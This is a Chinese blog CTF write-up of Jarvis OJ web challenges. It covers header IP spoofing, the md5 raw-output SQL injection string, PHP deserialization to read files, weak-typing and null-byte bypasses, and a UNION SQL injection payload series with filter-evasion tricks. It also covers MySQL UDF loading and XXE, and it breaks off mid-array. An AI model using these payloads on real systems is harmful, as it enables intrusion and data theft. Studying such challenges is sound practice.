<!DOCTYPE html>
<script async src="//dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js"></script>


  


<html class="theme-next gemini use-motion" lang="zh-Hans">
<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon.ico?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon.ico?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="CTF,web,">










<meta name="description" content="PORT51使用curl的--local-port功能强制使用本地51端口访问，但我在本地Windows没能跑通，可能不兼容吧。虚拟机里是把端口映射出来的，所以也跑不通。最后在服务器拿到了flag。">
<meta name="keywords" content="CTF,web">
<meta property="og:type" content="article">
<meta property="og:title" content="Jarvis OJ web部分WP">
<meta property="og:url" content="https://desperadoccy.github.io/2020/02/15/jarvis/index.html">
<meta property="og:site_name" content="desperadoccy的小窝">
<meta property="og:description" content="PORT51使用curl的--local-port功能强制使用本地51端口访问，但我在本地Windows没能跑通，可能不兼容吧。虚拟机里是把端口映射出来的，所以也跑不通。最后在服务器拿到了flag。">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="https://desperadoccy.github.io/2020/02/15/jarvis/1.png">
<meta property="og:image" content="https://desperadoccy.github.io/2020/02/15/jarvis/2.png">
<meta property="og:image" content="https://desperadoccy.github.io/2020/02/15/jarvis/3.png">
<meta property="og:image" content="https://desperadoccy.github.io/2020/02/15/jarvis/4.png">
<meta property="og:image" content="https://desperadoccy.github.io/2020/02/15/jarvis/5.png">
<meta property="og:image" content="https://desperadoccy.github.io/2020/02/15/jarvis/6.png">
<meta property="og:image" content="https://desperadoccy.github.io/2020/02/15/jarvis/7.png">
<meta property="og:image" content="https://desperadoccy.github.io/2020/02/15/jarvis/8.png">
<meta property="og:image" content="https://desperadoccy.github.io/2020/02/15/jarvis/9.png">
<meta property="og:image" content="https://desperadoccy.github.io/2020/02/15/jarvis/10.png">
<meta property="og:image" content="https://desperadoccy.github.io/2020/02/15/jarvis/11.png">
<meta property="og:image" content="https://desperadoccy.github.io/2020/02/15/jarvis/12.png">
<meta property="og:image" content="https://desperadoccy.github.io/2020/02/15/jarvis/13.png">
<meta property="og:image" content="https://desperadoccy.github.io/2020/02/15/jarvis/14.png">
<meta property="og:image" content="https://desperadoccy.github.io/2020/02/15/jarvis/15.png">
<meta property="og:updated_time" content="2020-02-21T09:34:34.978Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="Jarvis OJ web部分WP">
<meta name="twitter:description" content="PORT51使用curl的--local-port功能强制使用本地51端口访问，但我在本地Windows没能跑通，可能不兼容吧。虚拟机里是把端口映射出来的，所以也跑不通。最后在服务器拿到了flag。">
<meta name="twitter:image" content="https://desperadoccy.github.io/2020/02/15/jarvis/1.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Gemini',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="https://desperadoccy.github.io/2020/02/15/jarvis/">





  <title>Jarvis OJ web部分WP | desperadoccy的小窝</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">desperadoccy的小窝</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            归档
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br>
            
            关于
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br>
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br>
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-links">
          <a href="/links/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-link"></i> <br>
            
            友链
          </a>
        </li>
      

      
        <li class="menu-item menu-item-search">
          
            <a href="javascript:;" class="popup-trigger">
          
            
              <i class="menu-item-icon fa fa-search fa-fw"></i> <br>
            
            搜索
          </a>
        </li>
      
    </ul>
  

  
    <div class="site-search">
      
  <div class="popup search-popup local-search-popup">
  <div class="local-search-header clearfix">
    <span class="search-icon">
      <i class="fa fa-search"></i>
    </span>
    <span class="popup-btn-close">
      <i class="fa fa-times-circle"></i>
    </span>
    <div class="local-search-input-wrapper">
      <input autocomplete="off" placeholder="搜索..." spellcheck="false" type="text" id="local-search-input">
    </div>
  </div>
  <div id="local-search-result"></div>
</div>



    </div>
  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="https://desperadoccy.github.io/2020/02/15/jarvis/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="desperadoccy">
      <meta itemprop="description" content>
      <meta itemprop="image" content="/images/favicon.ico">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="desperadoccy的小窝">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">Jarvis OJ web部分WP</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2020-02-15T15:57:10+08:00">
                2020-02-15
              </time>
            

            

            
          </span>

          
            <span class="post-category">
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/CTF/" itemprop="url" rel="index">
                    <span itemprop="name">CTF</span>
                  </a>
                </span>

                
                
                  ， 
                
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/CTF/web/" itemprop="url" rel="index">
                    <span itemprop="name">web</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          
          

          
            <span class="post-meta-divider">|</span>
            <span class="page-pv"><i class="fa fa-file-o"></i> 阅读数
            <span class="busuanzi-value" id="busuanzi_value_page_pv"></span>
            </span>
          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h2 id="PORT51"><a href="#PORT51" class="headerlink" title="PORT51"></a>PORT51</h2><p>使用curl的<code>--local-port</code>功能强制使用本地51端口访问，但我在本地Windows没能跑通，可能不兼容吧。虚拟机里是把端口映射出来的，所以也跑不通。最后在服务器拿到了flag。<br><img src="//desperadoccy.github.io/2020/02/15/jarvis/1.png" alt="test"></p>
<a id="more"></a>
<h2 id="LOCALHOST"><a href="#LOCALHOST" class="headerlink" title="LOCALHOST"></a>LOCALHOST</h2><p>IP伪造,burp截包,改x-forwarded-for绕过<br><a href="/2019/07/31/False-ip/">IP伪造知识点传送门</a><br><img src="//desperadoccy.github.io/2020/02/15/jarvis/2.png" alt="test"></p>
<h2 id="Login"><a href="#Login" class="headerlink" title="Login"></a>Login</h2><p>查看http头得到hint<br><img src="//desperadoccy.github.io/2020/02/15/jarvis/3.png" alt="test"></p>
<p><code>md5($pass,true)</code>，md5第二个参数为输出格式，默认为false，</p>
<ul>
<li>TRUE - 原始 16 字符二进制格式</li>
<li>FALSE - 默认。32 字符十六进制数</li>
</ul>
<p><img src="//desperadoccy.github.io/2020/02/15/jarvis/4.png" alt="test"><br>意思就是当为True时,函数会将$pass变量加密后的字符串转换为Ascii对应的值<br>由此我们可以寻找一个字符串让其md5后的值为<code>&#39;or&#39;xxx</code>类型<br>这样sql语句就变成了</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> * <span class="keyword">from</span> <span class="string">`admin`</span> <span class="keyword">where</span> <span class="keyword">password</span>=<span class="string">''</span><span class="keyword">or</span><span class="string">'xxxx'</span>;</span><br></pre></td></tr></table></figure>
<p>例如字符串<code>ffifdyop</code><br><img src="//desperadoccy.github.io/2020/02/15/jarvis/5.png" alt="test"><br><img src="//desperadoccy.github.io/2020/02/15/jarvis/6.png" alt="test"></p>
<h2 id="神盾局的秘密"><a href="#神盾局的秘密" class="headerlink" title="神盾局的秘密"></a>神盾局的秘密</h2><p>f12查看前端源码,其中图片的路径很奇怪,<code>showimg.php?img=c2hpZWxkLmpwZw==</code><br>可以猜到它可能含有文件包含漏洞<br>读取各页面源码<br>index.php</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span> </span><br><span class="line">    <span class="keyword">require_once</span>(<span class="string">'shield.php'</span>);</span><br><span class="line">    $x = <span class="keyword">new</span> Shield();</span><br><span class="line">    <span class="keyword">isset</span>($_GET[<span class="string">'class'</span>]) &amp;&amp; $g = $_GET[<span class="string">'class'</span>];</span><br><span class="line">    <span class="keyword">if</span> (!<span class="keyword">empty</span>($g)) &#123;</span><br><span class="line">        $x = unserialize($g);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">echo</span> $x-&gt;readfile();</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>
<p>shield.php</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">    <span class="comment">//flag is in pctf.php</span></span><br><span class="line">    <span class="class"><span class="keyword">class</span> <span class="title">Shield</span> </span>&#123;</span><br><span class="line">        <span class="keyword">public</span> $file;</span><br><span class="line">        <span class="function"><span class="keyword">function</span> <span class="title">__construct</span><span class="params">($filename = <span class="string">''</span>)</span> </span>&#123;</span><br><span class="line">            <span class="keyword">$this</span> -&gt; file = $filename;</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        <span class="function"><span class="keyword">function</span> <span class="title">readfile</span><span class="params">()</span> </span>&#123;</span><br><span class="line">            <span class="keyword">if</span> (!<span class="keyword">empty</span>(<span class="keyword">$this</span>-&gt;file) &amp;&amp; stripos(<span class="keyword">$this</span>-&gt;file,<span class="string">'..'</span>)===<span class="keyword">FALSE</span>  </span><br><span class="line">            &amp;&amp; stripos(<span class="keyword">$this</span>-&gt;file,<span class="string">'/'</span>)===<span class="keyword">FALSE</span> &amp;&amp; stripos(<span class="keyword">$this</span>-&gt;file,<span class="string">'\\'</span>)==<span class="keyword">FALSE</span>) &#123;</span><br><span class="line">                <span class="keyword">return</span> @file_get_contents(<span class="keyword">$this</span>-&gt;file);</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>
<p>提示flag在pctf.php,明显利用反序列化读取文件,构造payload</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Shield</span></span>&#123;</span><br><span class="line">    <span class="keyword">public</span> $file;</span><br><span class="line">    <span class="function"><span class="keyword">function</span> <span class="title">__construct</span><span class="params">($filename = <span class="string">''</span>)</span> </span>&#123;</span><br><span class="line">        <span class="keyword">$this</span> -&gt; file = <span class="string">"pctf.php"</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">echo</span> serialize(<span class="keyword">new</span> Shield());</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>
<p><code>?class=O:6:&quot;Shield&quot;:1:{s:4:&quot;file&quot;;s:8:&quot;pctf.php&quot;;}</code><br><img src="//desperadoccy.github.io/2020/02/15/jarvis/7.png" alt="test"></p>
<h2 id="In-A-Mess"><a href="#In-A-Mess" class="headerlink" title="In A Mess"></a>In A Mess</h2><p>f12得到hint,查看源码</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line">error_reporting(<span class="number">0</span>);</span><br><span class="line"><span class="keyword">echo</span> <span class="string">"&lt;!--index.phps--&gt;"</span>;</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(!$_GET[<span class="string">'id'</span>])</span><br><span class="line">&#123;</span><br><span class="line">	header(<span class="string">'Location: index.php?id=1'</span>);</span><br><span class="line">	<span class="keyword">exit</span>();</span><br><span class="line">&#125;</span><br><span class="line">$id=$_GET[<span class="string">'id'</span>];</span><br><span class="line">$a=$_GET[<span class="string">'a'</span>];</span><br><span class="line">$b=$_GET[<span class="string">'b'</span>];</span><br><span class="line"><span class="keyword">if</span>(stripos($a,<span class="string">'.'</span>))</span><br><span class="line">&#123;</span><br><span class="line">	<span class="keyword">echo</span> <span class="string">'Hahahahahaha'</span>;</span><br><span class="line">	<span class="keyword">return</span> ;</span><br><span class="line">&#125;</span><br><span class="line">$data = @file_get_contents($a,<span class="string">'r'</span>);</span><br><span class="line"><span class="keyword">if</span>($data==<span class="string">"1112 is a nice lab!"</span> <span class="keyword">and</span> $id==<span class="number">0</span> <span class="keyword">and</span> strlen($b)&gt;<span class="number">5</span> <span class="keyword">and</span> eregi(<span class="string">"111"</span>.substr($b,<span class="number">0</span>,<span class="number">1</span>),<span class="string">"1114"</span>) <span class="keyword">and</span> substr($b,<span class="number">0</span>,<span class="number">1</span>)!=<span class="number">4</span>)</span><br><span class="line">&#123;</span><br><span class="line">	<span class="keyword">require</span>(<span class="string">"flag.txt"</span>);</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">else</span></span><br><span class="line">&#123;</span><br><span class="line">	<span class="keyword">print</span> <span class="string">"work harder!harder!harder!"</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>
<p>首先<code>$_GET[&#39;id&#39;]</code>同时要求<code>!$_GET[&#39;id&#39;]</code>和<code>$_GET[&#39;id&#39;]==0</code>同时成立,这里考察的是弱类型.令<code>$_GET[&#39;id&#39;]=&#39;0a&#39;</code>即可绕过<br>$a和$data利用php://input或者Data URI scheme协议上传文件内容<br>即$a=php://input同时post <code>1112 is a nice lab!</code><br>或者$a=data:,1112 is a nice lab!<br>最后$b是%00绕过,构造$b=%0023456<br><img src="//desperadoccy.github.io/2020/02/15/jarvis/8.png" alt="test"></p>
<p>发现这并不是flag,根据<code>/</code>猜测是路径,访问<a href="http://web.jarvisoj.com:32780/%5eHT2mCpcvOLf/index.php?id=1" target="_blank" rel="noopener">http://web.jarvisoj.com:32780/%5eHT2mCpcvOLf/index.php?id=1</a><br>接下来就是sql注入了<br>测试id处<br>发现<code>空格</code>,<code>/**/</code>被放入黑名单,可以利用<code>/*xxx*/</code>绕过<br>还有<code>select</code>,<code>union</code>,<code>from</code>被过滤,可以采用复写的方式绕过<br>payload</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/*测试回显位置*/</span></span><br><span class="line">?id=-1<span class="comment">/*1*/</span>ununionion<span class="comment">/*1*/</span>seselectlect<span class="comment">/*1*/</span>1%23</span><br><span class="line">?id=-1<span class="comment">/*1*/</span>ununionion<span class="comment">/*1*/</span>seselectlect<span class="comment">/*1*/</span>1,2%23</span><br><span class="line">?id=-1<span class="comment">/*1*/</span>ununionion<span class="comment">/*1*/</span>seselectlect<span class="comment">/*1*/</span>1,2,3%23</span><br><span class="line"><span class="comment">/*爆库*/</span></span><br><span class="line">?id=-1<span class="comment">/*1*/</span>ununionion<span class="comment">/*1*/</span>seselectlect<span class="comment">/*1*/</span>1,2,database()%23</span><br><span class="line"><span class="comment">/*库名 test*/</span></span><br><span class="line"><span class="comment">/*爆表*/</span></span><br><span class="line">?id=-1<span class="comment">/*1*/</span>ununionion<span class="comment">/*1*/</span>seselectlect<span class="comment">/*1*/</span>1,2,group_concat(table_name)<span class="comment">/*1*/</span>frofromm<span class="comment">/*1*/</span>information_schema.tables<span class="comment">/*1*/</span>where<span class="comment">/*1*/</span>table_schema=database()%23</span><br><span class="line"><span class="comment">/*表名 content*/</span></span><br><span class="line"><span class="comment">/*爆字段*/</span></span><br><span class="line">?id=-1<span class="comment">/*1*/</span>ununionion<span class="comment">/*1*/</span>seselectlect<span class="comment">/*1*/</span>1,2,group_concat(column_name)<span class="comment">/*1*/</span>frofromm<span class="comment">/*1*/</span>information_schema.columns<span class="comment">/*1*/</span>where<span class="comment">/*1*/</span>table_schema=database()%23</span><br><span class="line"><span class="comment">/*字段名 id,context,title*/</span></span><br><span class="line"><span class="comment">/*查找flag*/</span></span><br><span class="line">?id=-1<span class="comment">/*1*/</span>ununionion<span class="comment">/*1*/</span>seselectlect<span class="comment">/*1*/</span>1,2,group_concat(context)<span class="comment">/*1*/</span>frofromm<span class="comment">/*1*/</span>content%23</span><br><span class="line"><span class="comment">/*getflag*/</span></span><br></pre></td></tr></table></figure>
<h2 id="RE"><a href="#RE" class="headerlink" title="RE?"></a>RE?</h2><p>这题很有意思,需要将so文件导入到linux数据库中<br>先将文件下载到<code>/usr/lib64/mysql/plugin</code>以完成载入<br>接下来进入mysql,创建help_me函数并查看它</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">create</span> <span class="keyword">function</span> help_me <span class="keyword">returns</span> <span class="keyword">string</span> <span class="keyword">soname</span> <span class="string">'udf.so.02f8981200697e5eeb661e64797fc172'</span>;</span><br><span class="line"><span class="keyword">select</span> help_me();</span><br></pre></td></tr></table></figure>
<p><img src="//desperadoccy.github.io/2020/02/15/jarvis/9.png" alt="test"><br>题目要求我们访问getflag函数,那我们继续创建</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">create</span> <span class="keyword">function</span> getflag <span class="keyword">returns</span> <span class="keyword">string</span> <span class="keyword">soname</span> <span class="string">'udf.so.02f8981200697e5eeb661e64797fc172'</span>;</span><br><span class="line"><span class="keyword">select</span> getflag();</span><br></pre></td></tr></table></figure>
<p><img src="//desperadoccy.github.io/2020/02/15/jarvis/10.png" alt="test"></p>
<h2 id="PHPINFO"><a href="#PHPINFO" class="headerlink" title="PHPINFO"></a>PHPINFO</h2><p><a href="/2019/10/20/serialize/#例题">经典的session反序列化问题</a></p>
<h2 id="api调用"><a href="#api调用" class="headerlink" title="api调用"></a>api调用</h2><p>查看前端源码,发现支持xml通讯,所以猜测存在XXE漏洞<br>上传payload<br><img src="//desperadoccy.github.io/2020/02/15/jarvis/11.png" alt="test"></p>
<h2 id="WEB"><a href="#WEB" class="headerlink" title="WEB?"></a>WEB?</h2><p>查看源码,将app.js规则化,审计源码,发现是解线性方程</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span>(<span class="params">e</span>)</span></span><br><span class="line"><span class="function"> </span>&#123; </span><br><span class="line"><span class="keyword">if</span> (<span class="number">25</span> !== e.length) <span class="keyword">return</span> ! <span class="number">1</span>; </span><br><span class="line"><span class="keyword">for</span> (<span class="keyword">var</span> t = [], n = <span class="number">0</span>; n &lt; <span class="number">25</span>; n++) t.push(e.charCodeAt(n)); </span><br><span class="line"><span class="keyword">for</span> (<span class="keyword">var</span> r = [<span class="number">325799</span>, <span class="number">309234</span>, <span class="number">317320</span>, <span class="number">327895</span>, <span class="number">298316</span>, <span class="number">301249</span>, <span class="number">330242</span>, <span class="number">289290</span>, <span class="number">273446</span>, <span class="number">337687</span>, <span class="number">258725</span>, <span class="number">267444</span>, <span class="number">373557</span>, <span class="number">322237</span>, <span class="number">344478</span>, <span class="number">362136</span>, <span class="number">331815</span>, <span class="number">315157</span>, <span class="number">299242</span>, <span class="number">305418</span>, <span class="number">313569</span>, <span class="number">269307</span>, <span class="number">338319</span>, <span class="number">306491</span>, <span class="number">351259</span>], o = [[<span class="number">11</span>, <span class="number">13</span>, <span class="number">32</span>, <span class="number">234</span>, <span class="number">236</span>, <span class="number">3</span>, <span class="number">72</span>, <span class="number">237</span>, <span class="number">122</span>, <span class="number">230</span>, <span class="number">157</span>, <span class="number">53</span>, <span class="number">7</span>, <span class="number">225</span>, <span class="number">193</span>, <span class="number">76</span>, <span class="number">142</span>, <span class="number">166</span>, <span class="number">11</span>, <span class="number">196</span>, <span class="number">194</span>, <span class="number">187</span>, <span class="number">152</span>, <span class="number">132</span>, <span class="number">135</span>], [<span class="number">76</span>, <span class="number">55</span>, <span class="number">38</span>, <span class="number">70</span>, <span class="number">98</span>, <span class="number">244</span>, <span class="number">201</span>, <span class="number">125</span>, <span class="number">182</span>, <span class="number">123</span>, <span class="number">47</span>, <span class="number">86</span>, <span class="number">67</span>, <span class="number">19</span>, <span class="number">145</span>, <span class="number">12</span>, <span class="number">138</span>, <span class="number">149</span>, <span class="number">83</span>, <span class="number">178</span>, <span class="number">255</span>, <span class="number">122</span>, <span class="number">238</span>, <span class="number">187</span>, <span class="number">221</span>], [<span class="number">218</span>, <span class="number">233</span>, <span class="number">17</span>, <span class="number">56</span>, <span class="number">151</span>, <span class="number">28</span>, <span class="number">150</span>, <span class="number">196</span>, <span class="number">79</span>, <span class="number">11</span>, <span class="number">150</span>, <span class="number">128</span>, <span class="number">52</span>, <span class="number">228</span>, <span class="number">189</span>, <span class="number">107</span>, <span class="number">219</span>, <span class="number">87</span>, <span class="number">90</span>, <span class="number">221</span>, <span class="number">45</span>, <span class="number">201</span>, <span class="number">14</span>, <span class="number">106</span>, <span class="number">230</span>], [<span class="number">30</span>, <span class="number">50</span>, <span class="number">76</span>, <span class="number">94</span>, <span class="number">172</span>, <span class="number">61</span>, <span class="number">229</span>, <span class="number">109</span>, <span class="number">216</span>, <span class="number">12</span>, <span class="number">181</span>, <span class="number">231</span>, <span class="number">174</span>, <span class="number">236</span>, <span class="number">159</span>, <span class="number">128</span>, <span class="number">245</span>, <span class="number">52</span>, <span class="number">43</span>, <span class="number">11</span>, <span class="number">207</span>, <span class="number">145</span>, <span class="number">241</span>, <span class="number">196</span>, <span class="number">80</span>], [<span class="number">134</span>, <span class="number">145</span>, <span class="number">36</span>, <span class="number">255</span>, <span class="number">13</span>, <span class="number">239</span>, <span class="number">212</span>, <span class="number">135</span>, <span class="number">85</span>, <span class="number">194</span>, <span class="number">200</span>, <span class="number">50</span>, <span class="number">170</span>, <span class="number">78</span>, <span class="number">51</span>, <span class="number">10</span>, <span class="number">232</span>, <span class="number">132</span>, <span class="number">60</span>, <span class="number">122</span>, <span class="number">117</span>, <span class="number">74</span>, <span class="number">117</span>, <span class="number">250</span>, <span class="number">45</span>], [<span class="number">142</span>, <span class="number">221</span>, <span class="number">121</span>, <span class="number">56</span>, <span class="number">56</span>, <span class="number">120</span>, <span class="number">113</span>, <span class="number">143</span>, <span class="number">77</span>, <span class="number">190</span>, <span class="number">195</span>, <span class="number">133</span>, <span class="number">236</span>, <span class="number">111</span>, <span class="number">144</span>, <span class="number">65</span>, <span class="number">172</span>, <span class="number">74</span>, <span class="number">160</span>, <span class="number">1</span>, <span class="number">143</span>, <span class="number">242</span>, <span class="number">96</span>, <span class="number">70</span>, <span class="number">107</span>], [<span class="number">229</span>, <span class="number">79</span>, <span class="number">167</span>, <span class="number">88</span>, <span class="number">165</span>, <span class="number">38</span>, <span class="number">108</span>, <span class="number">27</span>, <span class="number">75</span>, <span class="number">240</span>, <span class="number">116</span>, <span class="number">178</span>, <span class="number">165</span>, <span class="number">206</span>, <span class="number">156</span>, <span class="number">193</span>, <span class="number">86</span>, <span class="number">57</span>, <span class="number">148</span>, <span class="number">187</span>, <span class="number">161</span>, <span class="number">55</span>, <span class="number">134</span>, <span class="number">24</span>, <span class="number">249</span>], [<span class="number">235</span>, <span class="number">175</span>, <span class="number">235</span>, <span class="number">169</span>, <span class="number">73</span>, <span class="number">125</span>, <span class="number">114</span>, <span class="number">6</span>, <span class="number">142</span>, <span class="number">162</span>, <span class="number">228</span>, <span class="number">157</span>, <span class="number">160</span>, <span class="number">66</span>, <span class="number">28</span>, <span class="number">167</span>, <span class="number">63</span>, <span class="number">41</span>, <span class="number">182</span>, <span class="number">55</span>, <span class="number">189</span>, <span class="number">56</span>, <span class="number">102</span>, <span class="number">31</span>, <span class="number">158</span>], [<span class="number">37</span>, <span class="number">190</span>, <span class="number">169</span>, <span class="number">116</span>, <span class="number">172</span>, <span class="number">66</span>, <span class="number">9</span>, <span class="number">229</span>, <span class="number">188</span>, <span class="number">63</span>, <span class="number">138</span>, <span class="number">111</span>, <span class="number">245</span>, <span class="number">133</span>, <span class="number">22</span>, <span class="number">87</span>, <span class="number">25</span>, <span class="number">26</span>, <span class="number">106</span>, <span class="number">82</span>, <span class="number">211</span>, <span class="number">252</span>, <span class="number">57</span>, <span class="number">66</span>, <span class="number">98</span>], [<span class="number">199</span>, <span class="number">48</span>, <span class="number">58</span>, <span class="number">221</span>, <span class="number">162</span>, <span class="number">57</span>, <span class="number">111</span>, <span class="number">70</span>, <span 